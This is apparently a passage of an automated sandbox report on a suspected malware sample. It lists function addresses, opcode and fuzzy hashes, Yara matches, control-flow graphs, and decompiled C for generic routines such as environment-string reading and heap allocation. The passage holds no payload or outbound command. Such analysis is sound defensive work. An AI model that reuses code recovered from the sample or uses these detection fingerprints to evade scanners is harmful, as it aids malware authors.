                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f564cab7c767f66c13dd66d080d636a04045c89a492264f8da32b86e951e833a
                        • Instruction ID: 637a9837d6f462fa0a4f69e2c694430b6bdc8712ed7662136008f438bf9e18f4
                        • Opcode Fuzzy Hash: f564cab7c767f66c13dd66d080d636a04045c89a492264f8da32b86e951e833a
                        • Instruction Fuzzy Hash: EAF1F1B4E00219CFDB54DFA9C884B9EFBB2BF88304F5481A9D848AB355DB709985CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0105792F Relevance: .3, Instructions: 341COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3319ba7bba3dd14f8acd53a2f4373849df29dd08a3a087705ef4a075dc92ff5c
                        • Instruction ID: 6ac85a6d6b297d187685c1f081d37dbb6b3dc26bbe482805c028af3a8e364019
                        • Opcode Fuzzy Hash: 3319ba7bba3dd14f8acd53a2f4373849df29dd08a3a087705ef4a075dc92ff5c
                        • Instruction Fuzzy Hash: EBE12475E002188FDB95DFA9C884BAEBBF2BF89304F6480A9D849A7355EB315D41DF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0105F9F0 Relevance: .3, Instructions: 273COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9ce26ac73b576ac30c86d1731be102b5f85a762f9e5c22f6d3a602c35958331b
                        • Instruction ID: 9f37801c7585ed3001a01423f8a60ab598437fb3ed1b5bd3be4e576a2127c843
                        • Opcode Fuzzy Hash: 9ce26ac73b576ac30c86d1731be102b5f85a762f9e5c22f6d3a602c35958331b
                        • Instruction Fuzzy Hash: DCC1A074E00218CFDB54DFA9D954BADBBB2BF89304F2080A9D809AB355DB359E85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01057E78 Relevance: .3, Instructions: 273COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ae7215ae566fdb5155cbecb438db1ead936d164d854104c5fcec138ccde309a
                        • Instruction ID: f6957dc4772122f13691205230b155eabbd965caf7fea3904db0c113382b07a7
                        • Opcode Fuzzy Hash: 3ae7215ae566fdb5155cbecb438db1ead936d164d854104c5fcec138ccde309a
                        • Instruction Fuzzy Hash: BBD1B078E00218CFDB54DFA9D894BADBBB2BF89304F2080A9D809A7355DB355E85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010582D8 Relevance: .3, Instructions: 272COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 10bf30959c3f681645db663cdd10d69c50bc8b4881ea542a3190c1f06853b4dd
                        • Instruction ID: 94e3feb441fd3900309a6801a01dc8df836536763d53221162f7645a6a71b3de
                        • Opcode Fuzzy Hash: 10bf30959c3f681645db663cdd10d69c50bc8b4881ea542a3190c1f06853b4dd
                        • Instruction Fuzzy Hash: 59D1B178E00258CFDB54DFA9D854B9DBBB2BF89304F2080AAD809A7355DB355E85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01058738 Relevance: .3, Instructions: 270COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c0c99456bf695bedc61d3a498ed85baadbb38ade404fda1bbded9626d31d7e6e
                        • Instruction ID: 64439ef513683192ceef8843524f1d0c075749568cdcafe6b84e31a609ec13e2
                        • Opcode Fuzzy Hash: c0c99456bf695bedc61d3a498ed85baadbb38ade404fda1bbded9626d31d7e6e
                        • Instruction Fuzzy Hash: C1C1A078E00218CFDB54DFA9D994B9DBBB2BF89304F2080AAD809A7355DB355E85CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01056EB9 Relevance: .2, Instructions: 221COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 66711889b6c58d1580d751590507283b0cfef352ac51ed917085ce974ff42601
                        • Instruction ID: 075fc7a2fde8a6147458efcfb724cb31857bf163332128a6b239a40fbebd2c66
                        • Opcode Fuzzy Hash: 66711889b6c58d1580d751590507283b0cfef352ac51ed917085ce974ff42601
                        • Instruction Fuzzy Hash: 1FA10270D00209CFEB54DFA9C994BDDBBF1BF88304F208269E448AB291DB759985CF55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01056EC8 Relevance: .2, Instructions: 220COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1c234d4ae621089c20e85a5cb90cf0ec1ed370d03dc9d69ad8708f681dbd40dd
                        • Instruction ID: f6ee7c9cf2ca9c9d3fa3f80a36cdabf0470200f176329aa6ded4b8f29dccd05b
                        • Opcode Fuzzy Hash: 1c234d4ae621089c20e85a5cb90cf0ec1ed370d03dc9d69ad8708f681dbd40dd
                        • Instruction Fuzzy Hash: 1FA11270D00209CFEB54DFA9C844BDDBBF1BF88304F208269E448AB291DB719985CF55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0105720E Relevance: .2, Instructions: 202COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8ef1d8f24010667dadc5ea83ad917ba160266b92263620181123676bf20f651c
                        • Instruction ID: d7d1fff5645b84148ab8b76a37b240e3d82e246c102cdd71b3bc10ed67368b7a
                        • Opcode Fuzzy Hash: 8ef1d8f24010667dadc5ea83ad917ba160266b92263620181123676bf20f651c
                        • Instruction Fuzzy Hash: 3D910274D00209CFEB50DFA8C844BDDBBB1FF49314F2086A9E849AB292DB759985CF14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00407507 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 100%
                        			E00407507() {
				WCHAR* _t1;
				void* _t3;
				void* _t17;
				WCHAR* _t19;

				_t1 = GetEnvironmentStringsW();
				_t19 = _t1;
				if(_t19 != 0) {
					_t11 = E004074D0(_t19) - _t19 & 0xfffffffe;
					_t3 = E00407D48(E004074D0(_t19) - _t19 & 0xfffffffe); // executed
					_t17 = _t3;
					if(_t17 != 0) {
						E00403120(_t17, _t19, _t11);
					}
					E0040650B(0);
					FreeEnvironmentStringsW(_t19);
					return _t17;
				} else {
					return _t1;
				}
			}







                        0x0040750a
                        0x00407510
                        0x00407514
                        0x00407524
                        0x00407528
                        0x0040752d
                        0x00407533
                        0x00407538
                        0x0040753d
                        0x00407542
                        0x00407549
                        0x00407554
                        0x00407517
                        0x00407517
                        0x00407517

                        APIs
                        • GetEnvironmentStringsW.KERNEL32(?,00404A94), ref: 0040750A
                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,00404A94), ref: 00407549
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnvironmentStrings$Free
                        • String ID:
                        • API String ID: 3328510275-0
                        • Opcode ID: 687c54f429ede6c9a3700f1b62dc63b57466bf3dfbcabf1351402392e6b5ef8b
                        • Instruction ID: b1f7f09f612f60460f80359e47cfd29f29434f3d7477643bc4f3bdfe63dfc6bb
                        • Opcode Fuzzy Hash: 687c54f429ede6c9a3700f1b62dc63b57466bf3dfbcabf1351402392e6b5ef8b
                        • Instruction Fuzzy Hash: 44E09B3754D63136D112323A7C4999F1A0DCFC6679715023BF4147A2C5EE789D0200EE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01053E18 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • KiUserExceptionDispatcher.NTDLL ref: 01053EAE
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: DispatcherExceptionUser
                        • String ID:
                        • API String ID: 6842923-0
                        • Opcode ID: 0672f81ceb52dce45d9753ed6c0923710d3839e06b7ed54d03eef9d416d3107a
                        • Instruction ID: 8c584a99f86072a9cc58d67b993eed516bcc05ad252ae4d58b70facb1d978784
                        • Opcode Fuzzy Hash: 0672f81ceb52dce45d9753ed6c0923710d3839e06b7ed54d03eef9d416d3107a
                        • Instruction Fuzzy Hash: DA51CF749A4246CFC3006F71F5BE52EBB65FB9F39B724BC15A41AD3156DB7010688E20
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01055E9D Relevance: 1.6, APIs: 1, Instructions: 103libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 949 1055e9d-1055ec3 call 1054630 954 1055ec5-1055ed1 949->954 955 1055ed3 954->955 956 1055ed8-1055ef1 954->956 955->956 958 1055e77-1055e80 956->958 959 1055ef3-1055f23 LdrInitializeThunk 956->959 960 1055e87-1055e9b 958->960 961 1055e82 958->961 964 1055f2a-1055fee 959->964 960->954 961->960 971 1055ff4-1056014 964->971 972 1056909-105693f 964->972 975 10568e6-1056902 971->975 976 1056019-1056022 975->976 977 1056908 975->977 978 1056024 976->978 979 1056029-105608f 976->979 977->972 978->979 983 1056096-1056123 979->983 984 1056091 979->984 990 1056135-105613c 983->990 991 1056125-105612c 983->991 984->983 994 1056143-1056150 990->994 995 105613e 990->995 992 1056133 991->992 993 105612e 991->993 992->994 993->992 996 1056157-105615e 994->996 997 1056152 994->997 995->994 998 1056165-10561bc 996->998 999 1056160 996->999 997->996 1002 10561c3-10561da 998->1002 1003 10561be 998->1003 999->998 1004 10561e5-10561ed 1002->1004 1005 10561dc-10561e3 1002->1005 1003->1002 1006 10561ee-10561f8 1004->1006 1005->1006 1007 10561ff-1056208 1006->1007 1008 10561fa 1006->1008 1009 10568b6-10568bc 1007->1009 1008->1007 1010 10568c2-10568dc 1009->1010 1011 105620d-1056219 1009->1011 1019 10568e3 1010->1019 1020 10568de 1010->1020 1012 1056220-1056225 1011->1012 1013 105621b 1011->1013 1014 1056227-1056233 1012->1014 1015 1056268-105626a 1012->1015 1013->1012 1017 1056235 1014->1017 1018 105623a-105623f 1014->1018 1021 1056270-1056284 1015->1021 1017->1018 1018->1015 1022 1056241-105624e 1018->1022 1019->975 1020->1019 1023 1056894-10568a1 1021->1023 1024 105628a-105629f 1021->1024 1028 1056255-1056266 1022->1028 1029 1056250 1022->1029 1027 10568a2-10568ac 1023->1027 1025 10562a6-1056323 1024->1025 1026 10562a1 1024->1026 1036 1056325-105634b 1025->1036 1037 105634d 1025->1037 1026->1025 1030 10568b3 1027->1030 1031 10568ae 1027->1031 1028->1021 1029->1028 1030->1009 1031->1030 1038 1056357-105636b 1036->1038 1037->1038 1039 10564c6-10564cb 1038->1039 1040 1056371-105637b 1038->1040 1044 10564cd-10564ed 1039->1044 1045 105652f-1056531 1039->1045 1042 1056382-10563a8 1040->1042 1043 105637d 1040->1043 1046 10563bf-10563c1 1042->1046 1047 10563aa-10563b4 1042->1047 1043->1042 1055 1056517 1044->1055 1056 10564ef-1056515 1044->1056 1048 1056537-1056557 1045->1048 1052 105644b-1056457 1046->1052 1050 10563b6 1047->1050 1051 10563bb-10563be 1047->1051 1053 105655d-1056567 1048->1053 1054 105688e-105688f 1048->1054 1050->1051 1051->1046 1057 105645e-1056463 1052->1057 1058 1056459 1052->1058 1059 105656e-1056597 1053->1059 1060 1056569 1053->1060 1061 1056890-1056892 1054->1061 1064 1056521-105652d 1055->1064 1056->1064 1065 1056465-1056472 1057->1065 1066 105648a-105648c 1057->1066 1058->1057 1062 10565b1-10565bf 1059->1062 1063 1056599-10565a3 1059->1063 1060->1059 1061->1027 1069 1056658-1056667 1062->1069 1067 10565a5 1063->1067 1068 10565aa-10565b0 1063->1068 1064->1048 1071 1056474 1065->1071 1072 1056479-1056488 1065->1072 1073 1056492-10564a6 1066->1073 1067->1068 1068->1062 1076 105666e-1056673 1069->1076 1077 1056669 1069->1077 1071->1072 1072->1073 1074 10563c6-10563db 1073->1074 1075 10564ac-10564c1 1073->1075 1080 10563e2-1056440 1074->1080 1081 10563dd 1074->1081 1075->1061 1078 1056675-1056685 1076->1078 1079 105669d-105669f 1076->1079 1077->1076 1082 1056687 1078->1082 1083 105668c-105669b 1078->1083 1084 10566a5-10566b9 1079->1084 1099 1056447-105644a 1080->1099 1100 1056442 1080->1100 1081->1080 1082->1083 1083->1084 1085 10565c4-10565df 1084->1085 1086 10566bf-105672b call 1054820 * 2 1084->1086 1088 10565e6-105664a 1085->1088 1089 10565e1 1085->1089 1097 1056734-105688a 1086->1097 1098 105672d-105672f 1086->1098 1105 1056651-1056657 1088->1105 1106 105664c 1088->1106 1089->1088 1102 105688b-105688c 1097->1102 1098->1102 1099->1052 1100->1099 1102->1010 1105->1069 1106->1105
                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.519443945.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1050000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 1da225d33c8d78af49e0f36f3bbfdf933542e2063adbabbff06ee2f0cb02596d
                        • Instruction ID: b38b03937bbd385d7adf72bcdde5137a00a850da18a84ce2b52c8ff5c05a9f63
                        • Opcode Fuzzy Hash: 1da225d33c8d78af49e0f36f3bbfdf933542e2063adbabbff06ee2f0cb02596d
                        • Instruction Fuzzy Hash: B841AD74A01228CFCB65DF68D894BE9B7B2BB89305F5086EAD449A7361D7319E81CF00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004064AE Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1350 4064ae-4064b9 1351 4064c7-4064cd 1350->1351 1352 4064bb-4064c5 1350->1352 1354 4064e6-4064f7 RtlAllocateHeap 1351->1354 1355 4064cf-4064d0 1351->1355 1352->1351 1353 4064fb-406506 call 40649b 1352->1353 1359 406508-40650a 1353->1359 1357 4064d2-4064d9 call 4051c4 1354->1357 1358 4064f9 1354->1358 1355->1354 1357->1353 1363 4064db-4064e4 call 4087b5 1357->1363 1358->1359 1363->1353 1363->1354
                        C-Code - Quality: 100%
                        			E004064AE(signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x4163ec, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E004051C4();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0040649B())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E004087B5(__eflags, _t19);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}








                        0x004064b4
                        0x004064b9
                        0x004064c7
                        0x004064c7
                        0x004064cd
                        0x004064cf
                        0x004064cf
                        0x004064e6
                        0x004064ef
                        0x004064f7
                        0x00000000
                        0x00000000
                        0x004064d7
                        0x004064d9
                        0x004064fb
                        0x00406500
                        0x00406506
                        0x00000000
                        0x00406506
                        0x004064dc
                        0x004064e2
                        0x004064e4
                        0x00000000
                        0x00000000
                        0x004064e4
                        0x00000000
                        0x004064e6
                        0x004064bf
                        0x004064c5
                        0x00000000
                        0x00000000
                        0x00000000

                        APIs
                        • RtlAllocateHeap.NTDLL(00000008,?,?,?,00405F2E,00000001,00000364,?,00000007,000000FF,?,?,004064A0,004050A7,?,00401668), ref: 004064EF
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 8f646ef87f97bce7b3fbb940021f70ed9acc1b429a1aae06431b718667ad30f8
                        • Instruction ID: 3efc618f0b7f40eca7bec11a0985368c4a4d2247eacbb5d5b70fa3bd5a8b9347
                        • Opcode Fuzzy Hash: 8f646ef87f97bce7b3fbb940021f70ed9acc1b429a1aae06431b718667ad30f8
                        • Instruction Fuzzy Hash: F6F0B43160852466DB219F22DD05B5B3758DB81770B17853BAC5ABA2C0CA78E82196AC
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00407D48 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1366 407d48-407d54 1367 407d86-407d91 call 40649b 1366->1367 1368 407d56-407d58 1366->1368 1376 407d93-407d95 1367->1376 1369 407d71-407d82 RtlAllocateHeap 1368->1369 1370 407d5a-407d5b 1368->1370 1372 407d84 1369->1372 1373 407d5d-407d64 call 4051c4 1369->1373 1370->1369 1372->1376 1373->1367 1378 407d66-407d6f call 4087b5 1373->1378 1378->1367 1378->1369
                        C-Code - Quality: 100%
                        			E00407D48(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0040649B())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4163ec, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E004051C4();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004087B5(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}






                        0x00407d4e
                        0x00407d54
                        0x00407d86
                        0x00407d8b
                        0x00407d91
                        0x00000000
                        0x00407d91
                        0x00407d58
                        0x00407d5a
                        0x00407d5a
                        0x00407d71
                        0x00407d7a
                        0x00407d82
                        0x00000000
                        0x00000000
                        0x00407d62
                        0x00407d64
                        0x00000000
                        0x00000000
                        0x00407d67
                        0x00407d6d
                        0x00407d6f
                        0x00000000
                        0x00000000
                        0x00407d6f
                        0x00000000

                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,00406E77,?,?,00406E77,00000220,?,00000000,?), ref: 00407D7A
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 8f5a00a2164cb918ef53a9def0475eb471bdd7ac5a97f66a80c2262a2e0ab220
                        • Instruction ID: 65cd16bcdc1b8bd721fcda30d9bca64849d6530a3f0c9080c4415b1d98ca3938
                        • Opcode Fuzzy Hash: 8f5a00a2164cb918ef53a9def0475eb471bdd7ac5a97f66a80c2262a2e0ab220
                        • Instruction Fuzzy Hash: 9FE0A931A0862456EA202B269C00F6B3A498F823B0B154233EC05B62D2DA7DE80182AF
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00E9D600 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.518940564.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_e9d000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3217c84e4a1ff55aa9d7b02b2e6afd92f580cc8ee4e65026247148ee63ca25dc
                        • Instruction ID: 52da0242a2bad91415329516b67fd0c537ce677f68d6543e281a8877eb9bca9c
                        • Opcode Fuzzy Hash: 3217c84e4a1ff55aa9d7b02b2e6afd92f580cc8ee4e65026247148ee63ca25dc
                        • Instruction Fuzzy Hash: EF2100B1608240DFDF15DF24DDC0B66BF65FB98324F2485A9E8092B247C336D856CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00E9D514 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.518940564.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_e9d000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 21f8d5b6b5d265f3530d2e2055ecdcd9d3d876365d97dcc12f9a0a1ffe70c008
                        • Instruction ID: da2e93f8a5bdc006c8f0ebbc4afb570e4800d0ea3bc948db0df1af4437651500
                        • Opcode Fuzzy Hash: 21f8d5b6b5d265f3530d2e2055ecdcd9d3d876365d97dcc12f9a0a1ffe70c008
                        • Instruction Fuzzy Hash: 762103B1508340EFDF11DF18D9C0B26BF65FB88318F248569E8056B246C336D856DBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00EAD01C Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.518997878.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_ead000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5be906533b51484575a8461ede10a1d55e682ecf43e8edb608410edf172f4207
                        • Instruction ID: 95b5e1b9621528f2e4c61acd73d6e86fdcb406e8687b8a144aed7168cfc15452
                        • Opcode Fuzzy Hash: 5be906533b51484575a8461ede10a1d55e682ecf43e8edb608410edf172f4207
                        • Instruction Fuzzy Hash: 8C21F571608340DFDB15DF24D9C4B26BF66FB89318F24C5A9E84A5F646C336E807CA61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00EAD005 Relevance: .1, Instructions: 62COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.518997878.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_ead000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 666cda6bf839e2fc1a9edeadfc145b2f9318c8fb34c882e0b7934e47c8432afa
                        • Instruction ID: ed7735cb35d1c057b24a574abed00811d0ac1dd3010adaa21e74a5d1c0f5930e
                        • Opcode Fuzzy Hash: 666cda6bf839e2fc1a9edeadfc145b2f9318c8fb34c882e0b7934e47c8432afa
                        • Instruction Fuzzy Hash: 17214F7550D3808FDB12CF24D9D4715BF72AB4A314F28C5EAD8498F697C33A980ACB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00E9D5FB Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.518940564.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_e9d000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6062e00843e0127835f222a966a73a669d8ce6edb45538b47e885cfc36e271a6
                        • Instruction ID: f598376606c5a65d54eb14f591012217bb542007ef7a4c04e1d939a4fb4049a4
                        • Opcode Fuzzy Hash: 6062e00843e0127835f222a966a73a669d8ce6edb45538b47e885cfc36e271a6
                        • Instruction Fuzzy Hash: 0611AC76508280DFCF12CF10D9C4B16BF61FB88324F24C6A9D8495B217C33AD85ACBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00E9D50F Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.518940564.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_e9d000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6062e00843e0127835f222a966a73a669d8ce6edb45538b47e885cfc36e271a6
                        • Instruction ID: 9df56ca5dd31a5b2644ff99f56dca70c8b51a1578e27fbf9acb7adfcc4c7be1b
                        • Opcode Fuzzy Hash: 6062e00843e0127835f222a966a73a669d8ce6edb45538b47e885cfc36e271a6
                        • Instruction Fuzzy Hash: 0E11D376508280DFCF12CF14D9C4B16BF71FB94328F24C6A9D8455B656C33AD85ACBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00E9D005 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.518940564.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_e9d000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 35a62065d7be695e5cd6f12cf365108c4fd89b3d2708c024acd51bf817e3bb88
                        • Instruction ID: 8f5ebc8f87e601a3c8e6c0239396b05c4ef2620586ac6d2277a33eb62403d705
                        • Opcode Fuzzy Hash: 35a62065d7be695e5cd6f12cf365108c4fd89b3d2708c024acd51bf817e3bb88
                        • Instruction Fuzzy Hash: 76012D6140E3D09FD7128B358C94752BFB49F53224F1981DBE9889F2A3C2695848C772
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00E9D01D Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.518940564.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_e9d000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 598461ce8da9ec889a4760b7e9434072cbfd00127494b271f7d0d3b52643766f
                        • Instruction ID: 2b874611363d39402349244e65414cb9088829b43fb004d274d6b902c8827bc4
                        • Opcode Fuzzy Hash: 598461ce8da9ec889a4760b7e9434072cbfd00127494b271f7d0d3b52643766f
                        • Instruction Fuzzy Hash: 8C01F77150C3509AEB118A2ACC847A7FF98EF41328F18D15AFD446B282C3799845C7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 010610B0 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 78servicestringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 81%
                        			E010610B0() {
				short _v548;
				void* __edi;
				void* __esi;
